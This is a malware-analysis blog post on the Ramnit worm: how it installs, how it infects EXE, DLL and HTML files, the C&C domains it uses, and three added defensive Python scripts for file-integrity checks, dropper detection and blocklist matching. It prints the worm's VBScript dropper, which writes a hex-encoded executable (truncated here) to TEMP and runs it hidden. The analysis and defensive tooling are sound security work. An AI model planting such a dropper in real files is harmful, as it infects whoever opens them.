Recently I came across a malware sample which made some suspicious network connections to a domain called zahlung.name. The domain name looks very suspicious (“Zahlung” is the German word for “payment”), so I decided to take a closer look at the sample.
*** Worm W32.Ramnit ***
Let’s take a quick look at the behavior of Ramnit. The Worm always installs itself into the same directory using the same filename (“DesktopLayer.exe”):
In this case the file has a very bad AV detection rate:
File size: 51’200 bytes
VT Result: 3 /43 (7.0%)
After the Worm has infected the computer, it starts iexplore.exe in hidden mode and injects itself into that process. This way the Worm is able to bypass the local firewall (the traffic appears to come from the browser) and communicate with its Command&Control server (C&C).
As soon as the computer is infected, the Worm starts to spread itself by infecting all files on the victim’s computer which have the file extension EXE, DLL or HTML. For example, if QuickTime Player is installed on the victim’s computer, the Worm will automatically search through its directory and infect the EXE, DLL and HTML files. Below is a screenshot of a clean system (before the infection):
Followed by a screenshot of an infected system (same directory):
Note that the file size and the modification date of the infected files have changed. The same goes for other directories containing EXE, DLL or HTML files, for example the Adobe Reader directory (before the infection):
And after the infection:
Let’s compare the original (clean) files with the infected files which have been patched by Worm Ramnit:
Original (clean) file:
* MD5: 6df76965a0fb8237e9c3b3cab9815ec2
* File size: 413’696 bytes
* VT result: 0/41 (0.0%)
Infected file:
* MD5: c32b6f477c5454d4e2cded81e686036d
* File size: 466’944 bytes
* VT result: 38/42 (90.5%)
*** AGM.dll (Adobe Reader) ***
Original (clean) file:
* MD5: 8f0b2030b5e42235c855a94a17f57118
* File size: 4’883’456 bytes
* VT result: 0/41 (0.0%)
Infected file:
* MD5: 833c79d662f8cc47579540dc03505419
* File size: 4’936’192 bytes
* VT result: 39/43 (90.7%)
As shown on VirusTotal, the files which have been infected by the Worm are detected reasonably well by most of the AV engines.
If we take a closer look into an infected HTML file, we will see that the Worm has appended a VBScript at the end of the file:
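The file-size and hash changes shown above are the most practical way to spot a file infector like this one on a host: take a baseline of the EXE, DLL and HTML files in the directories you care about while the system is known to be clean, then compare a later snapshot against it. The following Python script is an added example written for this post (it is not abuse.ch tooling and not part of the original article); the directory layout and file contents in `demo()` are constructed, and the only assumption is that an infected file grows and changes its hash, as the VirusTotal figures above show.

```python
import hashlib
import tempfile
from pathlib import Path

# File types the Worm is described as infecting (constructed example, not abuse.ch tooling).
WATCHED_SUFFIXES = {".exe", ".dll", ".html"}


def md5_of(path: Path) -> str:
    """MD5 of a file, read in chunks so large DLLs do not have to fit in memory."""
    digest = hashlib.md5()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root: Path) -> dict:
    """Map every watched file under root (relative POSIX path) to its (size, md5)."""
    result = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in WATCHED_SUFFIXES:
            result[p.relative_to(root).as_posix()] = (p.stat().st_size, md5_of(p))
    return result


def compare(baseline: dict, current: dict) -> dict:
    """Classify each watched file as grown (hash changed and size increased, the
    pattern of a file infector), modified (hash changed, not larger), new or missing."""
    report = {"grown": [], "modified": [], "new": [], "missing": []}
    for rel, (size, digest) in current.items():
        if rel not in baseline:
            report["new"].append(rel)
            continue
        base_size, base_digest = baseline[rel]
        if digest != base_digest:
            bucket = "grown" if size > base_size else "modified"
            report[bucket].append(rel)
    for rel in baseline:
        if rel not in current:
            report["missing"].append(rel)
    for key in report:
        report[key].sort()
    return report


def demo() -> dict:
    """Constructed scenario: a clean application directory is baselined, then two files
    have bytes appended to them the way a file infector patches its targets."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "Plugins").mkdir()
        clean_files = {
            "Player.exe": b"MZ" + b"\x00" * 100,        # constructed stand-in for a PE file
            "Plugins/Codec.dll": b"MZ" + b"\x01" * 200,
            "ReadMe.html": b"<html><body>Release notes</body></html>",
            "notes.txt": b"not a watched file type",
        }
        for rel, data in clean_files.items():
            (root / rel).write_bytes(data)
        baseline = snapshot(root)

        # Simulate the infection: appended code in the EXE, appended script in the HTML.
        with (root / "Player.exe").open("ab") as fh:
            fh.write(b"\x90" * 512)
        with (root / "ReadMe.html").open("ab") as fh:
            fh.write(b"<SCRIPT Language=VBScript>...</SCRIPT>")

        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    print(demo())
```

In practice you would store the baseline (for example as JSON) on write-protected media or a central server, since a file infector that can patch every EXE on the box can just as easily overwrite a baseline kept next to them.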
```vbscript
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000[...]"               ' hex-encoded PE image (4D5A = "MZ"), truncated here
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName   ' special folder 2 = the user's TEMP folder
If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))   ' decode two hex digits into one byte
    Next
    FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0                           ' window style 0 = run hidden
```
If a user opens the HTML file, the VBScript will drop a file called “svchost.exe” into the TEMP folder, execute it and infect the computer.
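Because the Worm appends its script after the document’s closing `</html>` tag and the script always uses the same objects (`Scripting.FileSystemObject`, `GetSpecialFolder(2)`, `WScript.Shell`, a hidden `Run` and a hex blob starting with the MZ header), infected HTML files can be triaged with a simple content check. The scanner below is an added example written for this post, not part of the original article; the two HTML documents are constructed test inputs (the “infected” one reuses the script skeleton shown above with a truncated payload), and the threshold of three indicators is an arbitrary choice for this example.

```python
import re

# Patterns taken from the dropper skeleton shown in the article (constructed example, not abuse.ch tooling).
INDICATORS = {
    "filesystem_object": re.compile(r"Scripting\.FileSystemObject", re.I),
    "temp_folder":       re.compile(r"GetSpecialFolder\(\s*2\s*\)", re.I),
    "wscript_shell":     re.compile(r"WScript\.Shell", re.I),
    "hidden_run":        re.compile(r"\.Run\s+\w+\s*,\s*0\b", re.I),
    "hex_pe_blob":       re.compile(r'WriteData\s*=\s*"4D5A', re.I),
}
DROP_NAME = re.compile(r'DropFileName\s*=\s*"([^"]+)"', re.I)


def analyse_html(text: str) -> dict:
    """Look only at the trailer after the last </html>: a script there is already odd,
    and the dropper indicators make it a likely file-infector artefact."""
    lower = text.lower()
    end = lower.rfind("</html>")
    trailer = text[end + len("</html>"):] if end != -1 else text
    script_after_close = end != -1 and "<script" in trailer.lower()
    hits = {name: bool(rx.search(trailer)) for name, rx in INDICATORS.items()}
    name_match = DROP_NAME.search(trailer)
    return {
        "script_after_html_close": script_after_close,
        "indicators": hits,
        "drop_filename": name_match.group(1) if name_match else None,
        "suspicious": script_after_close and sum(hits.values()) >= 3,
    }


# Constructed samples. The clean page has a normal script inside the body.
CLEAN_HTML = (
    "<html><body><p>Release notes</p>"
    "<script>document.title = 'notes';</script>"
    "</body></html>\n"
)

# The "infected" sample appends the skeleton from the article with a truncated payload.
INFECTED_HTML = CLEAN_HTML + (
    "<SCRIPT Language=VBScript>\n"
    'DropFileName = "svchost.exe"\n'
    'WriteData = "4D5A900003000000"\n'
    'Set FSO = CreateObject("Scripting.FileSystemObject")\n'
    'DropPath = FSO.GetSpecialFolder(2) & "\\" & DropFileName\n'
    'Set WSHshell = CreateObject("WScript.Shell")\n'
    "WSHshell.Run DropPath, 0\n"
    "</SCRIPT>\n"
)


if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_HTML), ("infected", INFECTED_HTML)):
        print(label, analyse_html(doc))
```

Run it over a directory of HTML files (read each file as text with `errors="replace"`) and anything that comes back `suspicious` is worth pulling into a sandbox; the `drop_filename` field tells you which file name to look for in `%TEMP%` on the same host.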
*** C&C Communication ***
The Worm uses its own proprietary protocol to communicate with the C&C server on port 443 (which is normally used for HTTPS, so the traffic blends in with encrypted web browsing). Since August 2010 I’ve seen three different domain names being used by Worm Ramnit:
- zahlung.name (first seen on 2010-10-01)
- glavdmn.com (first seen on 2010-09-16)
- fget-career.com (first seen on 2010-09-03)
I’ve Googled all three domain names and haven’t found any evidence that these domain names are malicious. But of course they are. Unfortunately, looking those domain names up on URLVoid doesn’t look any better:
- www.urlvoid.com/scan/zahlung.name [Detection: 1/17 (6 %)]
- www.urlvoid.com/scan/glavdmn.com [Detection: 1/17 (6 %)]
- www.urlvoid.com/scan/fget-career.com [Detection: 1/17 (6 %)]
It’s a pretty good example of how the AV industry sometimes fails.
*** How the Worm spreads itself ***
Worm Ramnit uses several ways to spread itself and infect other computers:
- Drive-by exploits
- Infecting EXE, DLL and HTML files on the victim’s computer
- Infecting removable media including USB sticks, USB hard drives and CDs
*** Conclusion ***
Due to the fact that the Worm always installs itself as “DesktopLayer.exe”, it shouldn’t be too hard to identify infected systems. If you Google for “DesktopLayer.exe” you will see over 30’000 hits, including users complaining about the file “DesktopLayer.exe” which they just found on their computer. So it looks like the Worm is already pretty widespread.
As already mentioned, the Worm has various methods by which it can spread itself. Worms are mainly a big problem for large networks (like corporate or governmental networks): if you have one infected computer, the Worm will spread quickly within your network by infecting removable drives or files on network shares.
The mentioned C&C domain names which are associated with Worm Ramnit are already listed on AMaDa. Therefore you can use the AMaDa C&C Domain Blocklist to block C&C traffic or to identify infected systems in your network.
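Matching a C&C domain blocklist against DNS query logs is the cheapest way to find infected hosts, and it is also where naive string matching goes wrong: a lookup for `update.glavdmn.com` must hit `glavdmn.com`, while `notzahlung.name` must not hit `zahlung.name`. The script below is an added example written for this post, not abuse.ch or AMaDa code. It assumes a blocklist in the shape of one domain per line with `#` comment lines, and the DNS log lines (timestamp, client IP, `query:`, name, type) are constructed for the example; the three domains are the ones named in the post.

```python
from collections import defaultdict

# Constructed blocklist excerpt; the one-domain-per-line format with '#' comments is an assumption.
BLOCKLIST_TEXT = """\
# C&C domains associated with Worm Ramnit (from the post above)
zahlung.name
glavdmn.com
fget-career.com
"""

# Constructed DNS query log: timestamp, client IP, "query:", queried name, record type.
DNS_LOG = """\
2010-10-02T09:12:01 10.0.0.15 query: www.example.com A
2010-10-02T09:12:07 10.0.0.15 query: zahlung.name A
2010-10-02T09:13:40 10.0.0.22 query: update.glavdmn.com A
2010-10-02T09:14:02 10.0.0.31 query: notzahlung.name A
2010-10-02T09:15:19 10.0.0.15 query: zahlung.name. A
"""


def load_blocklist(text: str) -> set:
    """Normalise to lower-case, strip trailing dots, ignore blanks and comments."""
    domains = set()
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            domains.add(line.lower().rstrip("."))
    return domains


def domain_blocked(qname: str, blocklist: set):
    """Return the blocklist entry that qname equals or is a subdomain of, else None.
    Labels are compared right to left, so 'notzahlung.name' does not match 'zahlung.name'."""
    labels = qname.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in blocklist:
            return candidate
    return None


def find_infected_hosts(log_text: str, blocklist: set) -> dict:
    """Map each client IP that resolved a blocklisted name to its (timestamp, name, entry) hits."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[2] != "query:":
            continue  # not a query line in the constructed format
        timestamp, client, _, qname = parts[:4]
        entry = domain_blocked(qname, blocklist)
        if entry is not None:
            hits[client].append((timestamp, qname, entry))
    return dict(hits)


if __name__ == "__main__":
    for client, events in find_infected_hosts(DNS_LOG, load_blocklist(BLOCKLIST_TEXT)).items():
        print(client, events)
```

The same `domain_blocked()` check can feed a resolver's response-policy or proxy deny rule; keep the blocklist refreshed, because the post shows the Worm rotating through a new domain every couple of weeks.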